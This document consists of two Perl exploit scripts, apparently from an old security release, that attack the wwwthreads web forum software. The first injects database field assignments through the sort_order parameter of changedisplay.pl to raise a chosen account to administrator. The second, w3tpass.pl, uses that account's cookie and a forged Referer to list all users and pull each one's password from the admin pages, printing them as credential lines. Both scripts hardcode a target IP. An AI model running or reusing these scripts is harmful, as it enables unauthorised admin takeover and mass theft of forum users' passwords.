#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

print sendraw($tosend);

sub sendraw {
        my ($pstr)=@_; my $target;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("Can't connect...\n"); }}


-[ w3tpass.pl

#!/usr/bin/perl
# download all wwwthread usernames/passwords once you're administrator
# send a fake cookie with authenciation and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv";

#####################################################

@letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ');
print STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists...";

foreach $let (@letts){
 $parms="Cat=&Start=$let";
 $tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
  "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
  "Cookie: Username=$username; Password=$passhash\r\n\r\n";

 my @D=sendraw($tosend);
 foreach $line (@D){
  if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
   push @users, $1;}}}

$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
 "Fetching individual passwords...\r\n";

foreach $user (@users){
 $parms="User=$user";
 $tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
  "Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
  "Cookie: Username=$username; Password=$passhash\r\n\r\n";

 my @D=sendraw($tosend);
 foreach $line (@D){
  if($line=~/OldPass value = "([^"]+)"/){
   ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
   $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
   print $user.':'.$pass."::::::::::\n";
   last;}}}

print STDERR "done.\r\n\r\n";

sub sendraw {
        my ($pstr)=@_; my $target;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("Can't connect...\n"); }}